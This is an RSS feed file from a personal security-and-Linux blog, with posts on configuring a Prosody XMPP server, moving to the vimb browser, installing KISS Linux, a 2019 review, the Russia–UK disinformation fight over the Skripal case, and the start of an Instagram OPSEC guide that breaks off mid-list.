pages/blog/feed.xml (view raw)
1<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
2 <channel>
3 <title>icyphox's blog</title>
4 <link>https://icyphox.sh/blog/</link>
5 <description>Computers, security and computer security.</description>
6 <atom:link href="https://icyphox.sh/blog/feed.xml" rel="self" type="application/xml"/>
7 <image>
8 <title>icyphox logo</title>
9 <url>https://icyphox.sh/icyphox.png</url>
10 <link>https://icyphox.sh/blog/</link>
11 </image>
12 <language>en-us</language>
13 <copyright>Creative Commons BY-NC-SA 4.0</copyright>
14 <item><title>Setting up Prosody for XMPP</title><description><![CDATA[<p>Remember the <a href="/blog/irc-for-dms/">IRC for DMs</a> article I wrote a while
15back? Well…it’s safe to say that IRC didn’t hold up too well. It first
16started with the bot. Buggy code, crashed a lot—we eventually gave up
17and didn’t bring the bot back up. Then came the notifications, or lack
18thereof. Revolution IRC has a bug where your custom notification rules
19just get ignored after a while. In my case, this meant that
20notifications for <code>#crimson</code> stopped entirely. Unless, of course, Nerdy
21pinged me each time.</p>
22
23<p>Again, none of these problems are inherent to IRC itself. IRC is
24fantastic, but perhaps wasn’t the best fit for our usecase. I still do
25use IRC though, just not for 1-on-1 conversations.</p>
26
27<h2 id="why-xmpp">Why XMPP?</h2>
28
29<p>For one, it’s better suited for 1-on-1 conversations. It also has
30support for end-to-end encryption (via OMEMO), something IRC doesn’t
31have.<sup class="footnote-ref" id="fnref-otr"><a href="#fn-otr">1</a></sup> Also, it isn’t centralized (think: email).</p>
32
33<h2 id="soprosody">So…Prosody</h2>
34
35<p><a href="https://prosody.im">Prosody</a> is an XMPP server. Why did I choose this
36over ejabberd, OpenFire, etc.? No reason, really. Their website looked
37cool, I guess.</p>
38
39<h3 id="installing">Installing</h3>
40
41<p>Setting it up was pretty painless (I’ve <a href="/blog/mailserver">experienced
42worse</a>). If you’re on a Debian-derived system, add:</p>
43
44<pre><code># modify according to your distro
45deb https://packages.prosody.im/debian buster main
46</code></pre>
47
48<p>to your <code>/etc/apt/sources.list</code>, and:</p>
49
50<pre><code># apt update
51# apt install prosody
52</code></pre>
53
54<h3 id="configuring">Configuring</h3>
55
56<p>Once installed, you will find the config file at
57<code>/etc/prosody/prosody.cfg.lua</code>. Add your XMPP user (we will make this
58later), to the <code>admins = {}</code> line.</p>
59
60<pre><code>admins = {"user@chat.example.com"}
61</code></pre>
62
63<p>Head to the <code>modules_enabled</code> section, and add this to it:</p>
64
65<pre><code>modules_enabled = {
66 "posix";
67 "omemo_all_access";
68...
69 -- uncomment these
70 "groups";
71 "mam";
72 -- and any others you think you may need
73}
74</code></pre>
75
76<p>We will install the <code>omemo_all_access</code> module later.</p>
77
78<p>Set <code>c2s_require_encryption</code>, <code>s2s_require_encryption</code>, and
79<code>s2s_secure_auth</code> to <code>true</code>.
80Set the <code>pidfile</code> to <code>/tmp/prosody.pid</code> (or just leave it as default?).</p>
81
82<p>By default, Prosody stores passwords in plain-text, so fix that by
83setting <code>authentication</code> to <code>"internal_hashed"</code></p>
84
85<p>Head to the <code>VirtualHost</code> section, and add your vhost. Right above it,
86set the path to the HTTPS certificate and key:</p>
87
88<pre><code>certificates = "certs" -- relative to your config file location
89https_certificate = "certs/chat.example.com.crt"
90https_key = "certs/chat.example.com.key"
91...
92
93VirtualHost "chat.example.com"
94</code></pre>
95
96<p>I generated these certs using Let’s Encrypt’s <code>certbot</code>, you can use
97whatever. Here’s what I did:</p>
98
99<pre><code># certbot --nginx -d chat.example.com
100</code></pre>
101
102<p>This generates certs at <code>/etc/letsencrypt/live/chat.example.com/</code>. You can
103trivially import these certs into Prosody’s <code>/etc/prosody/certs/</code> directory using:</p>
104
105<pre><code># prosodyctl cert import /etc/letsencrypt/live/chat.example.com
106</code></pre>
107
108<h3 id="plugins">Plugins</h3>
109
110<p>All the modules for Prosody can be <code>hg clone</code>’d from
111<a href="https://hg.prosody.im/prosody-modules.">https://hg.prosody.im/prosody-modules.</a> You will, obviously, need
112Mercurial installed for this.</p>
113
114<p>Clone it somewhere, and: </p>
115
116<pre><code># cp -R prosody-modules/mod_omemo_all_access /usr/lib/prosody/modules
117</code></pre>
118
119<p>Do the same thing for whatever other module you choose to install. Don’t
120forget to add it to the <code>modules_enabled</code> section in the config.</p>
121
122<h3 id="adding-users">Adding users</h3>
123
124<p><code>prosodyctl</code> makes this a fairly simple task:</p>
125
126<pre><code>$ prosodyctl adduser user@chat.example.com
127</code></pre>
128
129<p>You will be prompted for a password. You can optionally, enable
130user registrations from XMPP/Jabber clients (security risk!), by setting
131<code>allow_registration = true</code>.</p>
132
133<p>I may have missed something important, so here’s <a href="https://x.icyphox.sh/prosody.cfg.lua">my
134config</a> for reference.</p>
135
136<h2 id="closing-notes">Closing notes</h2>
137
138<p>That’s pretty much all you need for 1-on-1 E2EE chats. I don’t know much
139about group chats just yet—trying to create a group in Conversations
140gives a “No group chat server found”. I will figure it out later.</p>
141
142<p>Another thing that doesn’t work in Conversations is adding an account
143using an <code>SRV</code> record.<sup class="footnote-ref" id="fnref-srv"><a href="#fn-srv">2</a></sup> Which kinda sucks, because having a <code>chat.</code>
144subdomain isn’t very clean, but whatever.</p>
145
146<p>Oh, also—you can message me at
147<a href="xmpp:icy@chat.icyphox.sh">icy@chat.icyphox.sh</a>.</p>
148
149<div class="footnotes">
150<hr />
151<ol>
152<li id="fn-otr">
153<p>I’m told IRC supports OTR, but I haven’t ever tried. <a href="#fnref-otr" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
154</li>
155
156<li id="fn-srv">
157<p><a href="https://prosody.im/doc/dns">https://prosody.im/doc/dns</a> <a href="#fnref-srv" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
158</li>
159</ol>
160</div>
161]]></description><link>https://icyphox.sh/blog/prosody</link><pubDate>Tue, 18 Feb 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/prosody</guid></item><item><title>Status update</title><description><![CDATA[<p>It’s only been a two weeks since I got back to campus, and we’ve
162<em>already</em> got our first round of cycle tests starting this Tuesday.
163Granted, I returned a week late, but…that’s nuts!</p>
164
165<p>We’re two whole weeks into 2020; I should’ve been working on something
166status update worthy, right? Not really, but we’ll see.</p>
167
168<h2 id="no-more-cloudflare">No more Cloudflare!</h2>
169
170<p>Yep. If you weren’t aware—pre-2020 this site was behind Cloudflare
171SSL and their DNS. I have since migrated off it to
172<a href="https://he.net">he.net</a>, thanks to highly upvoted Lobste.rs comment.
173Because of this switch, I infact, learnt a ton about DNS.</p>
174
175<p>Migrating to HE was very painless, but I did have to research a lot
176about PTR records—Cloudflare kinda dumbs it down. In my case, I had to
177rename my DigitalOcean VPS instance to the FQDN, which then
178automagically created a PTR record at DO’s end.</p>
179
180<h2 id="i-dropped-icyrc">I dropped icyrc</h2>
181
182<p>The IRC client I was working on during the end of last
183December–early-January? Yeah, I lost interest. Apparently writing C and
184ncurses isn’t very fun or stimulating.</p>
185
186<p>This also means I’m back on weechat. Until I find another client that
187plays well with ZNC, that is.</p>
188
189<h2 id="kiss-stuff">KISS stuff</h2>
190
191<p>I now maintain two new packages in the KISS community repository—2bwm
192and aerc! The KISS package system is stupid simple to work with. Creating
193packages has never been easier.</p>
194
195<h2 id="icyphoxshfriendsfriends"><a href="/friends">icyphox.sh/friends</a></h2>
196
197<p>Did you notice that yet? I’ve been curating a list of people I know IRL
198and online, and linking to their online presence. This is like a webring
199of sorts, and promotes inter-site traffic—making the web more “web”
200again.</p>
201
202<p>If you know me, feel free to <a href="/about#contact">hit me up</a> and I’ll link
203your site too! My apologies if I’ve forgotten your name.</p>
204
205<h2 id="patreon">Patreon!</h2>
206
207<p>Is this big news? I dunno, but yes—I now have a Patreon. I figured I’d
208cash in on the newfound traffic my site’s been getting. There won’t be
209any exclusive content or any tiers or whatever. Nothing will change.
210Just a place for y’all to toss me some $$$ if you wish to do so. ;)</p>
211
212<p>Oh, and it’s at <a href="https://patreon.com/icyphox">patreon.com/icyphox</a>.</p>
213
214<h2 id="misc">Misc.</h2>
215
216<p>The Stormlight Archive is likely the <em>best</em> epic I have ever read till
217date. I’m still not done yet; about 500 odd pages to go as of this
218writing. But wow, Brandon really does know how to build worlds and magic
219systems. I cannot wait to read all about the
220<a href="https://coppermind.net/wiki/Cosmere">cosmere</a>.</p>
221
222<p>I have also been working out for the past month or so. I can see them
223gainzzz. I plan to keep track of my progress, I just don’t know how to
224quantify it. Perhaps I’ll log the number of reps × sets I do each time,
225and with what weights. I can then look back to see if either the weights
226have increased since, or the number of reps × sets have. If you know of
227a better way to quantify progress, let me know! I’m pretty new to this.</p>
228]]></description><link>https://icyphox.sh/blog/2020-01-18</link><pubDate>Sat, 18 Jan 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2020-01-18</guid></item><item><title>Vimb: my Firefox replacement</title><description><![CDATA[<p>After having recently installed <a href="https://getkiss.org">KISS</a>, and
229building Firefox from source, I was exposed to the true monstrosity that
230Firefox—and web browsers in general—is. It took all of 9 hours to
231build the dependencies and then Firefox itself.</p>
232
233<p>Sure, KISS now ships Firefox binaries in the
234<a href="https://github.com/kisslinux/repo/tree/master/extra/firefox-bin">firefox-bin</a>
235package; I decided to get rid of that slow mess anyway.</p>
236
237<h2 id="enter-vimb">Enter vimb</h2>
238
239<p><a href="https://fanglingsu.github.io/vimb/">vimb</a> is a browser based on
240<a href="https://webkitgtk.org/">webkit2gtk</a>, with a Vim-like interface.
241<code>webkit2gtk</code> builds in less than a minute—it blows Firefox out of
242the water, on that front.</p>
243
244<p>There isn’t much of a UI to it—if you’ve used Vimperator/Pentadactyl
245(Firefox plugins), vimb should look familiar to you.
246It can be configured via a <code>config.h</code> or a text based config file at
247<code>~/.config/vimb/config</code>.
248Each “tab” opens a new instance of vimb, in a new window but this can
249get messy really fast if you have a lot of tabs open.</p>
250
251<h2 id="enter-tabbed">Enter tabbed</h2>
252
253<p><a href="https://tools.suckless.org/tabbed/">tabbed</a> is a tool to <em>embed</em> X apps
254which support xembed into a tabbed UI. This can be used in conjunction
255with vimb, like so:</p>
256
257<pre><code>tabbed vimb -e
258</code></pre>
259
260<p>Where the <code>-e</code> flag is populated with the <code>XID</code>, by tabbed. Configuring
261Firefox-esque keybinds in tabbed’s <code>config.h</code> is relatively easy. Once
262that’s done—voilà! A fairly sane, Vim-like browsing experience that’s
263faster and has a smaller footprint than Firefox.</p>
264
265<h2 id="ad-blocking">Ad blocking</h2>
266
267<p>Ad blocking support isn’t built-in and there is no plugin system
268available. There are two options for ad blocking:</p>
269
270<ol>
271<li><a href="https://github.com/jun7/wyebadblock">wyebadblock</a></li>
272<li><code>/etc/hosts</code></li>
273</ol>
274
275<h2 id="caveats">Caveats</h2>
276
277<p><em>Some</em> websites tend to not work because they detect vimb as an older
278version of Safari (same web engine). This is a minor inconvenience, and
279not a dealbreaker for me. I also cannot login to Google’s services for
280some reason, which is mildly annoying, but it’s good in a way—I am now
281further incentivised to dispose of my Google account.</p>
282
283<p>And here’s the screenshot y’all were waiting for:</p>
284
285<p><img src="/static/img/vimb.png" alt="vimb" /></p>
286]]></description><link>https://icyphox.sh/blog/mnml-browsing</link><pubDate>Thu, 16 Jan 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/mnml-browsing</guid></item><item><title>Five days in a TTY</title><description><![CDATA[<p>This new semester has been pretty easy on me, so far. I hardly every
287have any classes (again, so far), and I’ve a ton of free time on my
288hands. This calls for—yep—a distro hop! </p>
289
290<h2 id="why-kiss">Why KISS?</h2>
291
292<p><a href="https://getkiss.org">KISS</a> has been making rounds on the interwebz lately.<sup class="footnote-ref" id="fnref-hn"><a href="#fn-hn">1</a></sup>
293The Hacker News post spurred <em>quite</em> the discussion. But then again,
294that is to be expected from Valleybros who use macOS all day. :^)</p>
295
296<p>From the website,</p>
297
298<blockquote>
299 <p>An independent Linux® distribution with a focus on simplicity and the
300 concept of “less is more”. The distribution targets <em>only</em> the x86-64
301 architecture and the English language.</p>
302</blockquote>
303
304<p>Like many people did in the HN thread, “simplicity” here is not to be
305confused with “ease”. It is instead, simplicity in terms of lesser and
306cleaner code—no
307<a href="https://www.urbandictionary.com/define.php?term=poetterware">Poetterware</a>.</p>
308
309<p>This, I can get behind. A clean system with less code is like a clean
310table. It’s nice to work on. It also implies security to a certain
311extent since there’s a smaller attack surface. </p>
312
313<p>The <a href="https://github.com/kisslinux/kiss"><code>kiss</code></a> package manager is written
314is pure POSIX sh, and does <em>just enough</em>. Packages are compiled from
315source and <code>kiss</code> automatically performs dependency resolution. Creating
316packages is ridiculously easy too.</p>
317
318<p>Speaking of packages, all packages—both official & community
319repos—are run through <code>shellcheck</code> before getting merged. This is
320awesome; I don’t think this is done in any other distro.</p>
321
322<p>In essence, KISS sucks less.</p>
323
324<h2 id="installing-kiss">Installing KISS</h2>
325
326<p>The <a href="https://getkiss.org/pages/install">install guide</a> is very easy to
327follow. Clear instructions that make it hard to screw up; that didn’t
328stop me from doing so, however.</p>
329
330<h3 id="day-1">Day 1</h3>
331
332<p>Although technically not in a TTY, it was still not <em>in</em> the KISS
333system—I’ll count it. I’d compiled the kernel in the chroot and
334decided to use <code>efibootmgr</code> instead of GRUB. <code>efibootmgr</code> is a neat tool
335to modify the Intel Extensible Firmware Interface (EFI). Essentially,
336you boot the <code>.efi</code> directly as opposed to choosing which boot entry
337you want to boot, through GRUB. Useful if you have just one OS on the
338system. Removes one layer of abstraction.</p>
339
340<p>Adding a new EFI entry is pretty easy. For me, the command was:</p>
341
342<pre><code>efibootmgr --create
343 --disk /dev/nvme0n1 \
344 --part 1 \
345 --label KISS Linux \
346 --loader /vmlinuz
347 --unicode 'root=/dev/nvme0n1p3 rw' # kernel parameters
348</code></pre>
349
350<p>Mind you, this didn’t work the first time, or the second, or the
351third … a bunch of trial and error (and asking on <code>#kisslinux</code>)
352later, it worked.</p>
353
354<p>Well, it booted, but not into KISS. Took a while to figure out that the
355culprit was <code>CONFIG_BLK_DEV_NVME</code> not having been set in the kernel
356config. Rebuild & reboot later, I was in.</p>
357
358<h3 id="day-2">Day 2</h3>
359
360<p>Networking! How fun. An <code>ip a</code> and I see that both USB tethering
361(ethernet) and wireless don’t work. Great. Dug around a bit—missing
362wireless drivers was the problem. Found my driver, a binary <code>.ucode</code> from
363Intel (eugh!). The whole day was spent in figuring out why the kernel
364would never load the firmware. I tried different variations—loading
365it as a module (<code>=m</code>), baking it in (<code>=y</code>) but no luck.</p>
366
367<h3 id="day-3">Day 3</h3>
368
369<p>I then tried Alpine’s kernel config but that was so huge and had a <em>ton</em>
370of modules and took far too long to build each time, much to my
371annoyance. Diffing their config and mine was about ~3000 lines! Too much
372to sift through. On a whim, I decided to scrap my entire KISS install
373and start afresh. </p>
374
375<p>For some odd reason, after doing the <em>exact</em> same things I’d done
376earlier, my wireless worked this time. Ethernet didn’t, and still
377doesn’t, but that’s ok.</p>
378
379<p>Building <code>xorg-server</code> was next, which took about an hour, mostly thanks
380to spotty internet. The build went through fine, though what wasn’t was
381no input after starting X. Adding my user to the <code>input</code> group wasn’t
382enough. The culprit this time was a missing <code>xf86-xorg-input</code> package.
383Installing that gave me my mouse back, but not the keyboard!</p>
384
385<p>It was definitely not the kernel this time, because I had a working
386keyboard in the TTY. </p>
387
388<h3 id="day-4-day-5">Day 4 & Day 5</h3>
389
390<p>This was probably the most annoying of all, since the fix was <em>trivial</em>.
391By this point I had exhausted all ideas, so I decided to build my
392essential packages and setup my system. Building Firefox took nearly
3939 hours, the other stuff were much faster.</p>
394
395<p>I was still chatting on IRC during this, trying to zero down on what the
396problem could be. And then:</p>
397
398<pre><code><dylanaraps> For starters I think st fails due to no fonts.
399</code></pre>
400
401<p>Holy shit! Fonts. I hadn’t installed <em>any</em> fonts. Which is why none of
402the applications I tried launching via <code>sowm</code> ever launched, and hence,
403I was lead to believe my keyboard was dead.</p>
404
405<h2 id="worth-it">Worth it?</h2>
406
407<p>Absolutely. I <em>cannot</em> stress on how much of a learning experience this
408was. Also a test of my patience and perseverance, but yeah ok. I also
409think that this distro is my endgame (yeah, right), probably because
410other distros will be nothing short of disappointing, in one way or
411another.</p>
412
413<p>Huge thanks to the folks at <code>#kisslinux</code> on Freenode for helping me
414throughout. And I mean, they <em>really</em> did. We chatted for hours on end
415trying to debug my issues.</p>
416
417<p>I’ll now conclude with an obligatory screenshot.</p>
418
419<p><img src="https://x.icyphox.sh/R6G.png" alt="scrot" /></p>
420
421<div class="footnotes">
422<hr />
423<ol>
424<li id="fn-hn">
425<p><a href="https://news.ycombinator.com/item?id=21021396">https://news.ycombinator.com/item?id=21021396</a> <a href="#fnref-hn" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
426</li>
427</ol>
428</div>
429]]></description><link>https://icyphox.sh/blog/five-days-tty</link><pubDate>Mon, 13 Jan 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/five-days-tty</guid></item><item><title>2019 in review</title><description><![CDATA[<p>Just landed in a rainy Chennai, back in campus for my 6th semester.
430A little late to the “year in review blog post” party; travel took up
431most of my time. Last year was pretty eventful (at least in my books),
432and I think I did a bunch of cool stuff—let’s see!</p>
433
434<h2 id="interning-at-securelayer7">Interning at SecureLayer7</h2>
435
436<p>Last summer, I interned at <a href="https://securelayer7.net">SecureLayer7</a>,
437a security consulting firm in Pune, India. My work was mostly in
438hardware and embededded security research. I learnt a ton about ARM and
439MIPS reversing and exploitation, UART and JTAG, firmware RE and
440enterprise IoT security.</p>
441
442<p>I also earned my first CVE! I’ve written about it in detail
443<a href="/blog/fb50">here</a>.</p>
444
445<h2 id="conferences">Conferences</h2>
446
447<p>I attended two major conferences last year—Nullcon Goa and PyCon
448India. Both super fun experiences and I met a ton of cool people!
449<a href="https://twitter.com/icyphox/status/1101022604851212288">Nullcon Twitter thread</a>
450and <a href="/blog/pycon-wrap-up">PyCon blog post</a>.</p>
451
452<h2 id="talks">Talks</h2>
453
454<p>I gave two talks last year:</p>
455
456<ol>
457<li><em>Intro to Reverse Engineering</em> at Cyware 2019</li>
458<li><em>"Smart lock? Nah dude."</em> at PyCon India</li>
459</ol>
460
461<h2 id="things-i-made">Things I made</h2>
462
463<p>Not in order, because I CBA:</p>
464
465<ul>
466<li><a href="https://github.com/icyphox/repl">repl</a>: More of a quick bash hack,
467I don’t really use it.</li>
468<li><a href="https://github.com/icyphox/pw">pw</a>: A password manager. This,
469I actually do use. I’ve even written a tiny
470<a href="https://github.com/icyphox/dotfiles/blob/master/bin/pwmenu.sh"><code>dmenu</code> wrapper</a>
471for it. </li>
472<li><a href="https://github.com/icyphox/twsh">twsh</a>: An incomplete twtxt client,
473in bash. I have yet to get around to finishing it.</li>
474<li><a href="https://github.com/icyphox/alpine">alpine ports</a>: My APKBUILDs for
475Alpine.</li>
476<li><a href="https://github.com/icyphox/detotated">detotated</a>: An IRC bot written
477in Python. See <a href="/blog/irc-for-dms">IRC for DMs</a>.</li>
478<li><a href="https://github.com/icyphox/icyrc">icyrc</a>: A no bullshit IRC client,
479because WeeChat is bloat.</li>
480</ul>
481
482<p>I probably missed something, but whatever.</p>
483
484<h2 id="blog-posts">Blog posts</h2>
485
486<pre><code>$ ls -1 pages/blog/*.md | wc -l
48720
488</code></pre>
489
490<p>So excluding today’s post, and <code>_index.md</code>, that’s 18 posts! I had
491initially planned to write one post a month, but hey, this is great. My
492plan for 2020 is to write one post a <em>week</em>—unrealistic, I know, but
493I will try nevertheless.</p>
494
495<p>I wrote about a bunch of things, ranging from programming to
496return-oriented-programming (heh), sysadmin and security stuff, and
497a hint of culture and philosophy. Nice!</p>
498
499<p>The <a href="/blog/python-for-re-1">Python for Reverse Engineering</a> post got
500a ton of attention on the interwebz, so that was cool.</p>
501
502<h2 id="bye-2019">Bye 2019</h2>
503
504<p>2019 was super productive! (in my terms). I learnt a lot of new things
505last year, and I can only hope to learn as much in 2020. :)</p>
506
507<p>I’ll see you next week.</p>
508]]></description><link>https://icyphox.sh/blog/2019-in-review</link><pubDate>Thu, 02 Jan 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/2019-in-review</guid></item><item><title>Disinfo war: RU vs GB</title><description><![CDATA[<p>This entire sequence of events begins with the attempted poisoning of
509Sergei Skripal<sup class="footnote-ref" id="fnref-skripal"><a href="#fn-skripal">1</a></sup>, an ex-GRU officer who was a double-agent for
510the UK’s intelligence services. This hit attempt happened on the 4th of
511March, 2018. 8 days later, then-Prime Minister Theresa May formally
512accused Russia for the attack.</p>
513
514<p>The toxin used in the poisoning was a nerve agent called <em>Novichok</em>.
515In addition to the British military-research facility at Porton Down,
516a small number of labs around the world were tasked with confirming
517Porton Down’s conclusions on the toxin that was used, by the OPCW
518(Organisation for the Prohibition of Chemical Weapons).</p>
519
520<p>With the background on the matter out of the way, here are the different
521instances of well timed disinformation pushed out by Moscow.</p>
522
523<h2 id="the-russian-offense">The Russian offense</h2>
524
525<h3 id="april-14-2018">April 14, 2018</h3>
526
527<ul>
528<li>RT published an article claiming that Spiez had identified a different
529toxin—BZ, and not Novichok.</li>
530<li>This was an attempt to shift the blame from Russia (origin of Novichok),
531to NATO countries, where it was apparently in use.</li>
532<li>Most viral piece on the matter in all of 2018.</li>
533</ul>
534
535<p>Although technically correct, this isn’t the entire truth. As part of
536protocol, the OPCW added a new substance to the sample as a test. If any
537of the labs failed to identify this substance, their findings were
538deemed untrustworthy. This toxin was a derivative of BZ.</p>
539
540<p>Here are a few interesting things to note:</p>
541
542<ol>
543<li>The entire process starting with the OPCW and the labs is top-secret.
544How did Russia even know Speiz was one of the labs?</li>
545<li>On April 11th, the OPCW mentioned BZ in a report confirming Porton
546Down’s findings. Note that Russia is a part of OPCW, and are fully
547aware of the quality control measures in place. Surely they knew
548about the reason for BZ’s use?</li>
549</ol>
550
551<p>Regardless, the Russian version of the story spread fast. They cashed in
552on two major factors to plant this disinfo:</p>
553
554<ol>
555<li>“NATO bad” : Overused, but surprisingly works. People love a story
556that goes full 180°.</li>
557<li>Spiez can’t defend itself: At the risk of revealing that it was one
558of the facilities testing the toxin, Spiez was only able to “not
559comment”.</li>
560</ol>
561
562<h3 id="april-3-2018">April 3, 2018</h3>
563
564<ul>
565<li>The Independent publishes a story based on an interview with the chief
566executive of Porton Down, Gary Aitkenhead.</li>
567<li>Aitkenhead says they’ve identified Novichok but “have not identified
568the precise source”.</li>
569<li>Days earlier, Boris Johnson (then-Foreign Secretary) claimed that
570Porton Down confirmed the origin of the toxin to be Russia.</li>
571<li>This discrepancy was immediately promoted by Moscow, and its network
572all over.</li>
573</ul>
574
575<p>This one is especially interesting because of how <em>simple</em> it is to
576exploit a small contradiction, that could’ve been an honest mistake.
577This episode is also interesting because the British actually attempted
578damage control this time. Porton Down tried to clarify Aitkenhead’s
579statement via a tweet<sup class="footnote-ref" id="fnref-dstltweet"><a href="#fn-dstltweet">2</a></sup>:</p>
580
581<blockquote>
582 <p>Our experts have precisely identified the nerve agent as a Novichok.
583 It is not, and has never been, our responsibility to confirm the source
584 of the agent @skynews @UKmoments</p>
585</blockquote>
586
587<p>Quoting the <a href="https://www.defenseone.com/threats/2019/12/britains-secret-war-russia/161665/">Defense One</a>
588article on the matter:</p>
589
590<blockquote>
591 <p>The episode is seen by those inside Britain’s security communications team
592 as the most serious misstep of the crisis, which for a period caused real
593 concern. U.K. officials told me that, in hindsight, Aikenhead could never
594 have blamed Russia directly, because that was not his job—all he was
595 qualified to do was identify the chemical. Johnson, in going too far,
596 was more damaging. Two years on, he is now prime minister.</p>
597</blockquote>
598
599<h3 id="may-2018">May 2018</h3>
600
601<ul>
602<li>OPCW facilities receive an email from Spiez inviting them to
603a conference.</li>
604<li>The conference itself is real, and has been organized before.</li>
605<li>The email however, was not—attached was a Word document containing
606malware.</li>
607<li>Also seen were inconsistencies in the email formatting, from what was
608normal.</li>
609</ul>
610
611<p>This spearphishing campaign was never offically attributed to Moscow,
612but there are a lot of tells here that point to it being the work of
613a state actor:</p>
614
615<ol>
616<li>Attack targetting a specific group of individuals.</li>
617<li>Relatively high level of sophistication—email formatting,
618malicious Word doc, etc.</li>
619</ol>
620
621<p>However, the British NCSC have deemed with “high confidence” that the
622attack was perpetrated by GRU. In the UK intelligence parlance, “highly
623likely” / “high confidence” usually means “definitely”.</p>
624
625<h2 id="britains-defense">Britain’s defense</h2>
626
627<h3 id="september-5-2018">September 5, 2018</h3>
628
629<p>The UK took a lot of hits in 2018, but they eventually came back:</p>
630
631<ul>
632<li>Metropolitan Police has a meeting with the press, releasing their
633findings.</li>
634<li>CCTV footage showing the two Russian hitmen was released.</li>
635<li>Traces of Novichok identified in their hotel room.</li>
636</ul>
637
638<p>This sudden news explosion from Britan’s side completely
639bulldozed the information space pertaining to the entire event.
640According to Defense One:</p>
641
642<blockquote>
643 <p>Only two of the 10 most viral stories in the weeks following the announcement
644 were sympathetic to Russia, according to NewsWhip. Finally, officials recalled,
645 it felt as though the U.K. was the aggressor. “This was all kept secret to
646 put the Russians on the hop,” one told me. “Their response was all over the
647 place from this point. It was the turning point.”</p>
648</blockquote>
649
650<p>Earlier in April, 4 GRU agents were arrested in the Netherlands, who
651were there to execute a cyber operation against the OPCW (located in The
652Hague), via their WiFi networks. They were arrested by Dutch security,
653and later identifed as belonging to Unit 26165. They also seized a bunch
654of equipment from the room and their car.</p>
655
656<blockquote>
657 <p>The abandoned equipment revealed that the GRU unit involved had sent
658 officers around the world to conduct similar cyberattacks. They had
659 been in Malaysia trying to steal information about the investigation
660 into the downed Malaysia Airlines Flight 17, and at a hotel in Lausanne,
661 Switzerland, where a World Anti-Doping Agency (WADA) conference was taking
662 place as Russia faced sanctions from the International Olympic Committee.
663 Britain has said that the same GRU unit attempted to compromise Foreign
664 Office and Porton Down computer systems after the Skripal poisoning.</p>
665</blockquote>
666
667<h3 id="october-4-2018">October 4, 2018</h3>
668
669<p>UK made the arrests public, published a list of infractions commited by
670Russia, along with the specific GRU unit that was caught.</p>
671
672<p>During this period, just one of the top 25 viral stories was from
673a pro-Russian outlet, RT—that too a fairly straightforward piece.</p>
674
675<h2 id="wrapping-up">Wrapping up</h2>
676
677<p>As with conventional warfare, it’s hard to determine who won. Britain
678may have had the last blow, but Moscow—yet again—depicted their
679finesse in information warfare. Their ability to seize unexpected
680openings, gather intel to facilitate their disinformation campaigns, and
681their cyber capabilities makes them a formidable threat. </p>
682
683<p>2020 will be fun, to say the least.</p>
684
685<div class="footnotes">
686<hr />
687<ol>
688<li id="fn-skripal">
689<p><a href="https://en.wikipedia.org/wiki/Sergei_Skripal">https://en.wikipedia.org/wiki/Sergei_Skripal</a> <a href="#fnref-skripal" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
690</li>
691
692<li id="fn-dstltweet">
693<p><a href="https://twitter.com/dstlmod/status/981220158680260613">https://twitter.com/dstlmod/status/981220158680260613</a> <a href="#fnref-dstltweet" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
694</li>
695</ol>
696</div>
697]]></description><link>https://icyphox.sh/blog/ru-vs-gb</link><pubDate>Thu, 12 Dec 2019 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/ru-vs-gb</guid></item><item><title>Instagram OPSEC</title><description><![CDATA[<p>Which I am not, of course. But seeing as most of my peers are, I am
698compelled to write this post. Using a social platform like Instagram
699automatically implies that the user understands (to some level) that
700their personally identifiable information is exposed publicly, and they
701sign up for the service understanding this risk—or I think they do,
702anyway. But that’s about it, they go ham after that. Sharing every nitty
703gritty detail of their private lives without understanding the potential
704risks of doing so.</p>
705
706<p>The fundamentals of OPSEC dictacte that you develop a threat model, and
707Instgrammers are <em>obviously</em> incapable of doing that—so I’ll do it
708for them. </p>
709
710<h2 id="your-average-instagrammers-threat-model">Your average Instagrammer’s threat model</h2>
711
712<p>I stress on the word “average”, as in this doesn’t apply to those with
713more than a couple thousand followers. Those type of accounts inherently
714face different kinds of threats—those that come with having
715a celebrity status, and are not in scope of this analysis.</p>
716
717<ul>
718<li><p><strong>State actors</strong>: This doesn’t <em>really</em> fit into our threat model,
719since our target demographic is simply not important enough. That said,
720there are select groups of individuals that operate on
721Instagram<sup class="footnote-ref" id="fnref-ddepisode"><a href="#fn-ddepisode">1</a></sup>, and they can potentially be targetted by a state
722actor.</p></li>
723<li><p><strong>OSINT</strong>: This is probably the biggest threat vector, simply because
724of the amount of visual information shared on the platform. A lot can be
725gleaned from one simple picture in a nondescript alleyway. We’ll get
726into this in the DOs and DON’Ts in a bit.</p></li>
727<li><p><strong>Facebook & LE</strong>: Instagram is the last place you want to be doing an
728illegal, because well, it’s logged and more importantly—not
729end-to-end encrypted. Law enforcement can subpoena any and all account
730information. Quoting Instagram’s
731<a href="https://help.instagram.com/494561080557017">page on this</a>:</p></li>
732</ul>
733
734<blockquote>
735 <p>a search warrant issued under the procedures described in the Federal
736 Rules of Criminal Procedure or equivalent state warrant procedures
737 upon a showing of probable cause is required to compel the disclosure
738 of the stored contents of any account, which may include messages,
739 photos, comments, and location information.</p>
740</blockquote>
741
742<p>That out of the way, here’s a list of DOs and DON’Ts to keep in mind
743while posting on Instagram.</p>
744
745<h3 id="donts">DON’Ts</h3>
746
747<ul>
748<li><p>Use Instagram for planning and orchestrating illegal shit! I’ve
749explained why this is a terrible idea above. Use secure comms—even
750WhatsApp is a better choice, if you have nothing else. In fact, try
751avoiding IG DMs altogether, use alternatives that implement E2EE.</p></li>
752<li><p>Film live videos outside. Or try not to, if you can. You might
753unknowingly include information about your location: street signs,
754shops etc. These can be used to ascertain your current location.</p></li>
755<li><p>Film live videos in places you visit often. This compromises your
756security at places you’re bound to be at.</p></li>
